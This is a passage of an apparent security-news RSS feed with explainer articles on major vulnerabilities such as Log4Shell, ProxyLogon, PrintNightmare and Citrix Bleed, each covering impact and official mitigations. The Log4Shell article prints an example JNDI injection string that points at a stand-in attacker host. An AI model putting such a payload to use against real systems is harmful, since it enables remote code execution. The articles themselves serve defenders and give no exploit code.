&lt;p&gt;Apply Microsoft&apos;s September 2021 cumulative security updates addressing CVE-2021-40444, and in environments where immediate patching isn&apos;t possible, apply the documented registry-based interim mitigation. The vulnerability was added to CISA&apos;s KEV catalog given confirmed active exploitation. Full technical detail is in &lt;a href=&quot;https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444&quot;&gt;Microsoft&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2021-40444&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-01-mshtml-office-zero-day-cve-2021-40444/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2021-40444</category><category>MSHTML</category><category>Office zero-day</category><category>ActiveX</category><category>phishing</category></item><item><title>ProxyLogon: Inside the Exchange Server Attack Chain That Triggered an FBI Court Order</title><link>https://0daynews.com/articles/2026-07-01-proxylogon-exchange-server-attack-chain/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-01-proxylogon-exchange-server-attack-chain/</guid><description>CVE-2021-26855 and three chained Exchange Server bugs gave attackers unauthenticated remote code execution — and led to a compromise event so widespread the FBI obtained a court order to remove webshells itself.</description><pubDate>Wed, 01 Jul 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Most major exploit chains stay in the realm of &quot;organizations should patch faster.&quot; &lt;a href=&quot;/cve/cve-2021-26855/&quot;&gt;CVE-2021-26855&lt;/a&gt;, the first link in the &quot;ProxyLogon&quot; chain against on-premises Microsoft Exchange Server, escalated to something rarer: a court-authorized FBI operation to remove malware from privately owned servers whose administrators hadn&apos;t cleaned them up.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;On its own, CVE-2021-26855 is a server-side request forgery (SSRF) bug: an unauthenticated attacker could make Exchange send arbitrary HTTP requests and, critically, authenticate to the server as if the request came from Exchange itself. Chained with three additional Exchange vulnerabilities — CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 — that authentication bypass became a path to writing an arbitrary file to disk: a webshell, planted with no authentication required at any step.&lt;/p&gt;
&lt;h2&gt;The disclosure and immediate fallout&lt;/h2&gt;
&lt;p&gt;Microsoft disclosed the chain and shipped emergency patches on March 2, 2021, attributing initial, narrow exploitation to a threat group it named Hafnium, focused on espionage against specific organizations. That narrow window didn&apos;t last. Within days, exploitation shifted from targeted intrusion to indiscriminate mass scanning: multiple opportunistic threat actors raced to plant webshells on every reachable, unpatched on-premises Exchange server before defenders could patch, expanding the victim count from a targeted set into tens of thousands of organizations worldwide.&lt;/p&gt;
&lt;h2&gt;Why the FBI got involved&lt;/h2&gt;
&lt;p&gt;By the time many organizations applied Microsoft&apos;s patch, webshells had already been planted — and patching alone doesn&apos;t remove a webshell already sitting on disk. A significant number of compromised, internet-facing Exchange servers went unremediated even after the patch was available, their owners apparently unaware they&apos;d already been breached. In April 2021, the U.S. Department of Justice announced the FBI had obtained a court order authorizing agents to remotely access hundreds of vulnerable Exchange servers and remove the specific webshells left by the Hafnium campaign — without notifying the owners in advance, an extraordinary step reflecting the scale of unremediated compromise.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;CISA issued an emergency directive requiring federal agencies to patch or disconnect vulnerable on-premises Exchange servers within days, not weeks — a compressed timeline unusual even for CISA&apos;s most urgent bulletins. The core guidance: patch immediately, and separately check for indicators of prior compromise (webshells, unusual mailbox exports) rather than assuming a clean patch means a clean server. Full technical detail on the four-CVE chain and detection guidance is in &lt;a href=&quot;https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855&quot;&gt;Microsoft&apos;s security response&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2021-26855&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the attack chain&apos;s impact and official detection/mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-01-proxylogon-exchange-server-attack-chain/cover.jpg" medium="image" width="1200" height="675"/><category>ProxyLogon</category><category>CVE-2021-26855</category><category>Exchange Server</category><category>Hafnium</category><category>webshell</category></item><item><title>PrintNightmare: How a Leaked Proof-of-Concept Forced an Emergency Windows Patch</title><link>https://0daynews.com/articles/2026-06-30-printnightmare-windows-print-spooler-explained/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-06-30-printnightmare-windows-print-spooler-explained/</guid><description>CVE-2021-34527 let attackers turn the Windows Print Spooler service — running by default on nearly every Windows machine — into a path to SYSTEM privileges or full domain compromise.</description><pubDate>Tue, 30 Jun 2026 15:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Windows&apos; Print Spooler service is one of those pieces of infrastructure most administrators never think about — it runs by default, quietly, on nearly every Windows machine, including domain controllers that print nothing at all. &lt;a href=&quot;/cve/cve-2021-34527/&quot;&gt;CVE-2021-34527&lt;/a&gt;, nicknamed &quot;PrintNightmare,&quot; turned that quiet default into an emergency out-of-band patch.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The Print Spooler service supports remote installation of printer drivers, a legitimate feature for centrally managing printers across a network. PrintNightmare abuses that capability: an authenticated attacker — even a low-privileged domain user — could trigger the spooler to install a malicious driver, and the spooler service runs with SYSTEM privileges. On a workstation, that&apos;s local privilege escalation. On a domain controller, where the spooler commonly runs by default, that&apos;s a path to full domain compromise.&lt;/p&gt;
&lt;h2&gt;How it came to light&lt;/h2&gt;
&lt;p&gt;The vulnerability&apos;s public disclosure was unusually chaotic. A distinct, related spooler bug (CVE-2021-1675) was already being patched by Microsoft when researchers, apparently believing the two issues were the same and already fixed, briefly published proof-of-concept exploit code for PrintNightmare — which was, in fact, still unpatched. Microsoft issued an emergency out-of-band security advisory on July 1, 2021, days ahead of its normal Patch Tuesday cycle, given that working exploit code was now public.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;The vulnerable functionality was so deeply embedded in how the spooler service worked that Microsoft&apos;s initial patch didn&apos;t fully close the hole — several follow-on bypasses were reported and patched over subsequent months. That extended uncertainty pushed many security teams toward a more drastic interim step: disabling the Print Spooler service entirely on servers where printing wasn&apos;t actually needed, which became Microsoft&apos;s own recommended hardening guidance for high-security environments, domain controllers especially.&lt;/p&gt;
&lt;p&gt;CISA added the CVE to its Known Exploited Vulnerabilities catalog given confirmed active exploitation, and federal agencies were required to apply mitigations on an accelerated timeline.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Apply Microsoft&apos;s cumulative security updates addressing PrintNightmare and its follow-on bypasses, and where the Print Spooler service isn&apos;t required — particularly on domain controllers — disable it rather than rely on patching alone. Full technical detail and guidance are in &lt;a href=&quot;https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527&quot;&gt;Microsoft&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2021-34527&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-06-30-printnightmare-windows-print-spooler-explained/cover.jpg" medium="image" width="1200" height="675"/><category>PrintNightmare</category><category>CVE-2021-34527</category><category>Windows Print Spooler</category><category>privilege escalation</category><category>domain controller compromise</category></item><item><title>Log4Shell, Explained: Why a Logging Library Became the Internet&apos;s Worst Week</title><link>https://0daynews.com/articles/2026-06-30-log4shell-log4j-anniversary-explainer/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-06-30-log4shell-log4j-anniversary-explainer/</guid><description>CVE-2021-44228 turned a single misused feature in Apache Log4j2 — a Java logging library embedded almost everywhere — into one of the most widely exploited vulnerabilities ever recorded.</description><pubDate>Tue, 30 Jun 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Some vulnerabilities are dangerous because of a coding mistake in one application. &lt;a href=&quot;/cve/cve-2021-44228/&quot;&gt;CVE-2021-44228&lt;/a&gt; — &quot;Log4Shell&quot; — was dangerous because of a design decision buried inside a dependency almost nobody outside a small circle of Java developers had ever heard of, embedded in an enormous share of the software running the internet.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;Apache Log4j2 is a logging library: code that writes application events — errors, requests, debug traces — to a file or console. One of its features, message lookup substitution, let a logged string trigger a JNDI (Java Naming and Directory Interface) lookup. That&apos;s normally an obscure convenience feature. The problem: Log4j2 would perform this lookup on &lt;em&gt;any&lt;/em&gt; string it logged, including strings supplied directly by a user — a chat message, an HTTP header, a search box entry.&lt;/p&gt;
&lt;p&gt;An attacker who could get a string like &lt;code&gt;${jndi:ldap://attacker.com/a}&lt;/code&gt; logged anywhere in a vulnerable application could cause that application to reach out to an attacker-controlled server and load — and execute — malicious Java code. No authentication. No special access. Just a string ending up somewhere in a log file.&lt;/p&gt;
&lt;h2&gt;Why it spread so fast&lt;/h2&gt;
&lt;p&gt;Log4j2 isn&apos;t usually something developers add directly to their own applications&apos; top-level dependency list — it&apos;s typically pulled in transitively, several layers deep, by other libraries and frameworks. That made the first challenge not &quot;patch Log4j&quot; but &quot;figure out everywhere Log4j is running,&quot; a nontrivial software-inventory problem most organizations weren&apos;t prepared to answer quickly. Public demonstrations, starting with Minecraft&apos;s chat-based exploitation within hours of disclosure on December 10, 2021, showed how trivially the bug could be triggered — and mass internet scanning for vulnerable endpoints began almost immediately after.&lt;/p&gt;
&lt;h2&gt;The scale of the fallout&lt;/h2&gt;
&lt;p&gt;CISA and international CERT agencies issued emergency directives. The initial Apache patch, Log4j 2.15.0, turned out to be incomplete, and two further related issues (CVE-2021-45046, CVE-2021-45105) required additional point releases before the library was considered fully remediated at 2.17.x. Security teams spent weeks, in some organizations months, on inventory and remediation — a process complicated by the sheer number of vendors who had to identify, patch, and re-ship their own products before customers could even apply an update.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;The core guidance from the Apache Logging Services team and CISA was consistent throughout: upgrade to a patched Log4j2 release (2.17.1 or later for the full remediation), and where immediate upgrade isn&apos;t possible, apply documented interim mitigations (disabling the JNDI lookup feature via system property, or removing the vulnerable class from the classpath). Full technical detail, affected version ranges, and patch guidance are in &lt;a href=&quot;https://logging.apache.org/log4j/2.x/security.html&quot;&gt;Apache&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2021-44228&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s mechanism and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-06-30-log4shell-log4j-anniversary-explainer/cover.jpg" medium="image" width="1200" height="675"/><category>Log4Shell</category><category>CVE-2021-44228</category><category>Apache Log4j2</category><category>JNDI injection</category><category>remote code execution</category></item><item><title>The Outlook &apos;MonikerLink&apos; Bug: One Click, Protected View Bypassed</title><link>https://0daynews.com/articles/2026-06-28-outlook-monikerlink-rce-patch-tuesday-explainer/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-06-28-outlook-monikerlink-rce-patch-tuesday-explainer/</guid><description>CVE-2024-21413 let attackers bypass Outlook&apos;s Protected View sandbox with a single specially crafted hyperlink, leading to code execution and potential credential leakage. Patched in February 2024&apos;s Patch Tuesday.</description><pubDate>Sun, 28 Jun 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Most enterprise phishing defenses assume that even if a user clicks something they shouldn&apos;t, sandboxing and content protections will limit the damage. &lt;a href=&quot;/cve/cve-2024-21413/&quot;&gt;CVE-2024-21413&lt;/a&gt; — nicknamed &quot;MonikerLink&quot; by Check Point Research, which discovered and reported it — broke that assumption for Microsoft Outlook with a single click.&lt;/p&gt;
&lt;h2&gt;How the bug works&lt;/h2&gt;
&lt;p&gt;Outlook normally opens untrusted file attachments and links inside Protected View, a sandboxed mode that strips out active content and limits what a document can do until the user explicitly trusts it. MonikerLink found a way around that: by crafting a hyperlink using the &lt;code&gt;file://&lt;/code&gt; moniker syntax with a specific exclamation-mark suffix appended, an attacker could cause Outlook to open the referenced file directly, completely bypassing Protected View.&lt;/p&gt;
&lt;p&gt;The consequences ranged from remote code execution to, in some configurations, leaking the user&apos;s NTLM credential hash to an attacker-controlled server — useful for relay attacks even without full code execution.&lt;/p&gt;
&lt;h2&gt;Disclosure and patch&lt;/h2&gt;
&lt;p&gt;Microsoft patched CVE-2024-21413 as part of its &lt;a href=&quot;https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413&quot;&gt;February 2024 Patch Tuesday release&lt;/a&gt;, assigning it a CVSS score of 9.8. Unlike several other vulnerabilities covered by this desk, Microsoft did not confirm active in-the-wild exploitation at time of disclosure — but security teams treated it as a same-week priority patch regardless, given how trivial the trigger condition was (one click on a link inside an email) and how often Protected-View-bypass techniques get weaponized shortly after public disclosure.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;Outlook remains one of the most widely deployed email clients in enterprise environments, and email is still the dominant initial-access vector for ransomware and business email compromise campaigns. A bug that defeats a core anti-exploitation control with a single click — no macro, no attachment download, just a link — is precisely the kind of flaw that lowers the bar for a successful phishing campaign from &quot;convince someone to enable macros&quot; to &quot;convince someone to click.&quot;&lt;/p&gt;
&lt;p&gt;Full technical writeup and the patch itself are documented in &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2024-21413&quot;&gt;Microsoft&apos;s MSRC advisory&lt;/a&gt; and the linked NVD record.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability and its real-world impact only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-06-28-outlook-monikerlink-rce-patch-tuesday-explainer/cover.jpg" medium="image" width="1200" height="675"/><category>Microsoft Outlook</category><category>CVE-2024-21413</category><category>MonikerLink</category><category>Patch Tuesday</category><category>Protected View bypass</category></item><item><title>PAN-OS GlobalProtect Zero-Day Gave Attackers Root on the Firewall Itself</title><link>https://0daynews.com/articles/2026-06-27-pan-os-globalprotect-command-injection-zero-day/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-06-27-pan-os-globalprotect-command-injection-zero-day/</guid><description>CVE-2024-3400, a maximum-severity command-injection flaw in Palo Alto Networks&apos; PAN-OS GlobalProtect feature, was exploited in the wild before a patch existed — handing attackers root access to the perimeter firewall.</description><pubDate>Sat, 27 Jun 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;A firewall is supposed to be the wall. When the wall itself has a remotely exploitable, unauthenticated, root-level code-execution flaw, the entire premise of perimeter defense breaks down — which is exactly the scenario &lt;a href=&quot;/cve/cve-2024-3400/&quot;&gt;CVE-2024-3400&lt;/a&gt; created for Palo Alto Networks customers in April 2024.&lt;/p&gt;
&lt;h2&gt;What the flaw allowed&lt;/h2&gt;
&lt;p&gt;CVE-2024-3400 is a command-injection vulnerability in the GlobalProtect feature of PAN-OS, the operating system running on Palo Alto Networks&apos; next-generation firewalls. On specific PAN-OS versions with a GlobalProtect gateway or portal configured — and device telemetry or session ID re-use enabled — an unauthenticated, remote attacker could execute arbitrary code with root privileges directly on the firewall. It carries the maximum CVSS score of 10.0.&lt;/p&gt;
&lt;p&gt;Root code execution on a firewall isn&apos;t just &quot;another RCE.&quot; It means an attacker controls the very device that&apos;s supposed to be inspecting and blocking malicious traffic — with the ability to disable logging, modify rules, pivot into the internal network, and persist across reboots.&lt;/p&gt;
&lt;h2&gt;Active exploitation before disclosure&lt;/h2&gt;
&lt;p&gt;Palo Alto Networks and Volexity jointly disclosed the vulnerability on April 12, 2024, confirming it was being exploited in the wild as a zero-day. Volexity attributed the activity to a threat actor it tracks as UTA0218, which deployed a custom Python-based backdoor — dubbed UPSTYLE — on compromised firewalls to maintain access and pull additional tooling onto the device post-compromise.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.cisa.gov/known-exploited-vulnerabilities-catalog&quot;&gt;CVE-2024-3400 was added to CISA&apos;s KEV catalog&lt;/a&gt; within days of disclosure, with federal agencies required to apply mitigations or patches on an expedited timeline.&lt;/p&gt;
&lt;h2&gt;The response&lt;/h2&gt;
&lt;p&gt;Palo Alto Networks moved quickly, publishing both temporary mitigation steps — for customers who could not immediately patch — and hotfixes across the affected PAN-OS version branches. The company also released a tool to help customers determine whether a given firewall showed signs of compromise, since (as with several other zero-days on this tracker) patching alone does not undo an established backdoor on an already-compromised device.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;Perimeter security devices — firewalls, VPN gateways, secure web gateways — have increasingly become the entry point of choice for sophisticated attackers precisely because they&apos;re internet-facing by design and historically under-monitored relative to standard endpoints. A root-RCE zero-day in a market-leading firewall product is about as severe an instance of that pattern as exists.&lt;/p&gt;
&lt;p&gt;Full advisory detail, affected configurations, and patch guidance are published by &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2024-3400&quot;&gt;Palo Alto Networks&lt;/a&gt; and reflected in the NVD record above.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability and its real-world impact only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-06-27-pan-os-globalprotect-command-injection-zero-day/cover.jpg" medium="image" width="1200" height="675"/><category>PAN-OS</category><category>CVE-2024-3400</category><category>GlobalProtect</category><category>firewall vulnerability</category><category>command injection</category></item><item><title>Inside the Ivanti Connect Secure Zero-Day Chain Attackers Used Before a Patch Existed</title><link>https://0daynews.com/articles/2026-06-26-ivanti-connect-secure-chained-zero-days-explained/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-06-26-ivanti-connect-secure-chained-zero-days-explained/</guid><description>CVE-2023-46805 and CVE-2024-21887, chained together, gave a suspected nation-state actor unauthenticated remote code execution on Ivanti Connect Secure and Policy Secure VPN gateways for weeks before patches.</description><pubDate>Fri, 26 Jun 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Two vulnerabilities, neither individually catastrophic on paper, became one of the more consequential edge-device exploitation chains of early 2024 when attackers combined them against Ivanti&apos;s VPN gateway products.&lt;/p&gt;
&lt;h2&gt;The two flaws&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;/cve/cve-2023-46805/&quot;&gt;CVE-2023-46805&lt;/a&gt; is an authentication-bypass vulnerability in the web component of Ivanti Connect Secure and Policy Secure. On its own, it lets an unauthenticated attacker reach restricted application resources — serious, but limited.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;/cve/cve-2024-21887/&quot;&gt;CVE-2024-21887&lt;/a&gt; is a command-injection vulnerability in the same product line. On its own, exploiting it requires administrative authentication — a meaningful barrier.&lt;/p&gt;
&lt;p&gt;Chained together, the barrier disappears. An attacker uses the authentication bypass to reach the administrative functionality, then uses the command-injection flaw — now reachable without ever logging in — to execute arbitrary commands on the appliance. The combination yields full unauthenticated remote code execution.&lt;/p&gt;
&lt;h2&gt;Who exploited it, and when&lt;/h2&gt;
&lt;p&gt;Ivanti and Mandiant disclosed both vulnerabilities on January 10, 2024, but Mandiant&apos;s investigation found exploitation had begun well before that date, attributing early activity to a suspected China-nexus espionage actor tracked as UNC5221. The actor deployed custom web shells and credential-harvesting tooling, and in some cases attempted to actively evade Ivanti&apos;s own internal integrity checker — the tool customers were told to use to check for compromise.&lt;/p&gt;
&lt;h2&gt;CISA&apos;s emergency directive&lt;/h2&gt;
&lt;p&gt;The combination of severity, confirmed nation-state exploitation, and the position of VPN gateways directly on the network perimeter prompted &lt;a href=&quot;https://www.cisa.gov/known-exploited-vulnerabilities-catalog&quot;&gt;CISA to issue an emergency directive&lt;/a&gt; requiring federal civilian agencies to disconnect affected Ivanti Connect Secure and Policy Secure appliances from their networks — not just patch them — pending mitigation. Both CVEs were added to the KEV catalog simultaneously.&lt;/p&gt;
&lt;h2&gt;The broader pattern&lt;/h2&gt;
&lt;p&gt;Ivanti&apos;s edge appliances were the subject of multiple additional vulnerability disclosures throughout 2024, reinforcing a broader trend: VPN gateways, firewalls, and other perimeter devices — designed to be internet-facing by definition — have become a preferred initial-access vector precisely because they sit outside the protections (EDR, internal monitoring) that organizations apply to standard endpoints.&lt;/p&gt;
&lt;p&gt;Full chain analysis, affected versions, and Ivanti&apos;s remediation timeline are published in &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2024-21887&quot;&gt;Ivanti&apos;s security advisory&lt;/a&gt; and the linked NVD records for both CVEs.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability chain and its real-world impact only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-06-26-ivanti-connect-secure-chained-zero-days-explained/cover.jpg" medium="image" width="1200" height="675"/><category>Ivanti Connect Secure</category><category>CVE-2023-46805</category><category>CVE-2024-21887</category><category>vulnerability chaining</category><category>VPN appliance security</category></item><item><title>Citrix Bleed: How a Memory Leak in NetScaler Bypassed MFA Entirely</title><link>https://0daynews.com/articles/2026-06-25-citrix-bleed-netscaler-session-hijacking-explained/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-06-25-citrix-bleed-netscaler-session-hijacking-explained/</guid><description>CVE-2023-4966, known as Citrix Bleed, let attackers pull live session tokens straight out of NetScaler ADC and Gateway memory — hijacking already-authenticated sessions without needing a password or MFA code.</description><pubDate>Thu, 25 Jun 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Multi-factor authentication is supposed to be the backstop that makes stolen passwords not enough. &lt;a href=&quot;/cve/cve-2023-4966/&quot;&gt;CVE-2023-4966&lt;/a&gt; — better known by its nickname, Citrix Bleed — demonstrated a category of flaw that skips the password-and-MFA problem entirely: it steals an already-authenticated session.&lt;/p&gt;
&lt;h2&gt;How the bug works, at a high level&lt;/h2&gt;
&lt;p&gt;Citrix Bleed is a buffer-overflow vulnerability in Citrix NetScaler ADC and NetScaler Gateway appliances configured as a gateway — VPN virtual server, ICA proxy, CVPN, or RDP proxy — or as an AAA virtual server. Exploiting it lets a remote, unauthenticated attacker retrieve data directly from the device&apos;s memory, including valid session tokens belonging to legitimate, already-logged-in users.&lt;/p&gt;
&lt;p&gt;Because those tokens represent sessions that have already cleared authentication and MFA, an attacker who captures one can simply present it to the appliance and be treated as that user — no credentials, no second factor, no password reset required. It&apos;s session hijacking with the authentication step already completed by someone else.&lt;/p&gt;
&lt;h2&gt;Exploitation in the wild&lt;/h2&gt;
&lt;p&gt;Citrix disclosed CVE-2023-4966 on October 10, 2023. Mandiant later reported that exploitation had begun even before the public disclosure, and that ransomware-affiliated actors, including groups linked to LockBit, used the flaw to compromise large enterprises — among the most notable publicly reported victims was a major financial-sector firm whose breach was directly tied to Citrix Bleed exploitation. &lt;a href=&quot;https://www.cisa.gov/known-exploited-vulnerabilities-catalog&quot;&gt;CVE-2023-4966 was added to CISA&apos;s KEV catalog&lt;/a&gt; in November 2023.&lt;/p&gt;
&lt;h2&gt;The patching trap that made this worse&lt;/h2&gt;
&lt;p&gt;What made Citrix Bleed especially dangerous operationally: patching the appliance alone was not sufficient. Session tokens stolen before the patch was applied remained valid afterward, because the patch fixed the vulnerability going forward but did nothing to invalidate sessions already hijacked. Citrix&apos;s guidance — and CISA&apos;s — was explicit that administrators needed to kill all active ICA and PCoIP sessions after patching, not just apply the update and move on.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;Citrix Bleed is a clean illustration of why &quot;we have MFA&quot; is not a complete security story. Token-theft and session-hijacking vulnerabilities sidestep authentication controls entirely, and they&apos;re increasingly the technique of choice for sophisticated ransomware affiliates who&apos;d rather steal a valid session than guess a password.&lt;/p&gt;
&lt;p&gt;Full technical detail, affected build numbers, and remediation steps are published in &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2023-4966&quot;&gt;Citrix&apos;s own security bulletin&lt;/a&gt; and the NVD record.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability and its real-world impact only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-06-25-citrix-bleed-netscaler-session-hijacking-explained/cover.jpg" medium="image" width="1200" height="675"/><category>Citrix Bleed</category><category>CVE-2023-4966</category><category>NetScaler</category><category>session hijacking</category><category>MFA bypass</category></item><item><title>Cisco IOS XE Web UI Zero-Day: How One Bug Compromised Tens of Thousands of Devices</title><link>https://0daynews.com/articles/2026-06-24-cisco-ios-xe-web-ui-zero-day-mass-exploitation/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-06-24-cisco-ios-xe-web-ui-zero-day-mass-exploitation/</guid><description>CVE-2023-20198, a maximum-severity privilege-escalation flaw in Cisco IOS XE&apos;s web management interface, was exploited at mass scale before a patch existed — handing attackers full admin control of network infrastructure.</description><pubDate>Wed, 24 Jun 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;When Cisco disclosed CVE-2023-20198 on October 16, 2023, it came with an unusual admission: exploitation was already underway, against an unknown but apparently large number of devices, before any patch existed. By the time independent researchers finished scanning the public internet days later, estimates of compromised Cisco IOS XE devices ran into the tens of thousands.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;/cve/cve-2023-20198/&quot;&gt;CVE-2023-20198&lt;/a&gt; lives in the Web UI feature of Cisco IOS XE Software — the operating system that powers a large share of the world&apos;s enterprise switches, routers, and wireless LAN controllers. The flaw carries the maximum CVSS score of 10.0 because of how little an attacker needs: no authentication, no special access, just the ability to reach the device&apos;s web management interface.&lt;/p&gt;
&lt;p&gt;Successful exploitation lets a remote attacker create a local user account with privilege level 15 — Cisco&apos;s top privilege tier, equivalent to full administrative control of the device. From there, attackers were observed pairing the bug with a second vulnerability, CVE-2023-20273, to inject a persistent implant directly into the device&apos;s filesystem.&lt;/p&gt;
&lt;h2&gt;The scale of exploitation&lt;/h2&gt;
&lt;p&gt;This wasn&apos;t a narrow, targeted campaign. Within days of Cisco&apos;s disclosure, scans of the public internet found tens of thousands of IOS XE devices carrying signs of the implant — a number that made this one of the largest network-device compromise events of 2023. Devices with the web UI feature reachable directly from the internet — a configuration many administrators use for remote management — were the most exposed.&lt;/p&gt;
&lt;p&gt;Cisco&apos;s Talos threat intelligence team published detection guidance, including a curl-based check administrators could run to look for the implant&apos;s signature file, and urged any organization running IOS XE with internet-facing web management to assume compromise and re-image affected devices rather than simply patch and move on, since the implant could survive in some configurations.&lt;/p&gt;
&lt;h2&gt;CISA&apos;s response&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://www.cisa.gov/known-exploited-vulnerabilities-catalog&quot;&gt;CVE-2023-20198&lt;/a&gt; was added to the CISA Known Exploited Vulnerabilities catalog with an expedited remediation deadline reflecting both the severity and the confirmed in-the-wild exploitation. Federal civilian agencies running affected Cisco gear were required to patch or disconnect exposed devices on a compressed timeline.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Cisco&apos;s guidance was consistent: disable the web UI feature on internet-facing devices where it isn&apos;t strictly required, apply the patched IOS XE release, and check for the implant specifically — patching alone does not remove an implant already deployed on a compromised device. Full technical detail, affected platforms, and patch availability are in &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2023-20198&quot;&gt;Cisco&apos;s security advisory&lt;/a&gt; and the CISA KEV catalog entry.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and Cisco&apos;s official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-06-24-cisco-ios-xe-web-ui-zero-day-mass-exploitation/cover.jpg" medium="image" width="1200" height="675"/><category>Cisco IOS XE</category><category>CVE-2023-20198</category><category>privilege escalation</category><category>KEV catalog</category><category>network device exploitation</category></item></channel></rss>